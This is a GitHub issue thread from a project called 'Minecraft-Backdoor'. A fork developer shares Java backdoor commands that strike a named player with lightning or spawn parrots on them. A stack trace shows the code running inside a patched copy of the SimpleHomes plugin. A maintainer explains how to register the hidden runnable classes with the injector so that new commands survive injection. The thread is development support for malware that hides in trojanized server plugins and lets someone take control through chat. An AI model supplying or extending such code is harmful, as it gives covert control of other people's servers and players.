### ISSUE TITLE
Why do some commands not work?

### ISSUE THREAD

**Issue by mmvanheusden** [ThiccIndustries/Minecraft-Backdoor#47]
i am working on my own fork of this project, with more commands, but i am getting stuck.

why does this work ⬇️ 
```java
case "strike": {
                if (args.length < 2) //No player specified
                    return false;
                Player target = Bukkit.getPlayer(args[1]);
                target.getTargetBlock(null, 45);
                new BukkitRunnable() {
                    @Override
                    public void run() {
                        target.getWorld().spawnEntity(target.getLocation(), EntityType.LIGHTNING);
                        target.getWorld().spawnEntity(target.getLocation(), EntityType.LIGHTNING);
                        target.getWorld().spawnEntity(target.getLocation(), EntityType.LIGHTNING);
                    }
                }.runTask(plugin);

                return true;
            }
```

but this not ⬇️ 
```java
case "parrot": {
                if (args.length < 3) //syntax [prefix] parrot [player] [amount]
                    return false;
                Player target = Bukkit.getPlayer(args[1]);
                int aantal = Integer.parseInt((args[2]));
                new BukkitRunnable() {
                    @Override
                    public void run() {
                        for (int i = 0; i < aantal; i++) {
                            target.getWorld().spawnEntity(target.getLocation(), EntityType.PARROT);
                        }
                    }
                }.runTask(plugin);

                return true;
            }
```

this is the error:

```
[07:43:56 ERROR]: Could not pass event AsyncPlayerChatEvent to SimpleHomes v2.0.4
java.lang.NoClassDefFoundError: com/thiccindustries/debugger/Debugger$12
	at com.thiccindustries.debugger.Debugger.ParseCommand(Debugger.java:422) ~[SimpleHomes-patched.jar:?]
	at com.thiccindustries.debugger.Debugger.onChat(Debugger.java:109) ~[SimpleHomes-patched.jar:?]
	at com.destroystokyo.paper.event.executor.asm.generated.GeneratedEventExecutor23.execute(Unknown Source) ~[?:?]
	at org.bukkit.plugin.EventExecutor.lambda$create$1(EventExecutor.java:69) ~[paper-api-1.18.1-R0.1-SNAPSHOT.jar:?]
	at co.aikar.timings.TimedEventExecutor.execute(TimedEventExecutor.java:76) ~[paper-api-1.18.1-R0.1-SNAPSHOT.jar:git-Paper-105]
	at org.bukkit.plugin.RegisteredListener.callEvent(RegisteredListener.java:70) ~[paper-api-1.18.1-R0.1-SNAPSHOT.jar:?]
	at org.bukkit.plugin.SimplePluginManager.callEvent(SimplePluginManager.java:628) ~[paper-api-1.18.1-R0.1-SNAPSHOT.jar:?]
	at io.papermc.paper.adventure.ChatProcessor.post(ChatProcessor.java:230) ~[paper-1.18.1.jar:git-Paper-105]
	at io.papermc.paper.adventure.ChatProcessor.processingLegacyFirst(ChatProcessor.java:115) ~[paper-1.18.1.jar:git-Paper-105]
	at io.papermc.paper.adventure.ChatProcessor.process(ChatProcessor.java:64) ~[paper-1.18.1.jar:git-Paper-105]
	at net.minecraft.server.network.ServerGamePacketListenerImpl.chat(ServerGamePacketListenerImpl.java:2185) ~[?:?]
	at net.minecraft.server.network.ServerGamePacketListenerImpl.handleChat(ServerGamePacketListenerImpl.java:2096) ~[?:?]
	at net.minecraft.server.network.ServerGamePacketListenerImpl.handleChat(ServerGamePacketListenerImpl.java:2062) ~[?:?]
	at net.minecraft.network.protocol.game.ServerboundChatPacket$1.run(ServerboundChatPacket.java:40) ~[?:?]
	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539) ~[?:?]
	at java.util.concurrent.FutureTask.run(FutureTask.java:264) ~[?:?]
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136) ~[?:?]
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635) ~[?:?]
	at java.lang.Thread.run(Thread.java:833) ~[?:?]
Caused by: java.lang.ClassNotFoundException: com.thiccindustries.debugger.Debugger$12
	at org.bukkit.plugin.java.PluginClassLoader.loadClass0(PluginClassLoader.java:151) ~[paper-api-1.18.1-R0.1-SNAPSHOT.jar:?]
	at org.bukkit.plugin.java.PluginClassLoader.loadClass(PluginClassLoader.java:103) ~[paper-api-1.18.1-R0.1-SNAPSHOT.jar:?]
	at java.lang.ClassLoader.loadClass(ClassLoader.java:520) ~[?:?]
	... 19 more
```

**Comment by mmvanheusden** [comment]
i use 1.18.1 btw

**Comment by MajesticWaffle** [comment]
The bukkit runnable actually creates a hidden class called Debugger$12.class that needs to be added to resource_paths_required in Injector.java

**Comment by mmvanheusden** [comment]
ah that makes sense, do i have to do that for every command i add?

**Comment by MajesticWaffle** [comment]
If they use a bukkit runnable, yes. There's probably some fancy Java thing to automate the list instead of having to teadiously do it manually.

Probably get a list of files inside the jar stream, and pick all the ones that start with Debugger?
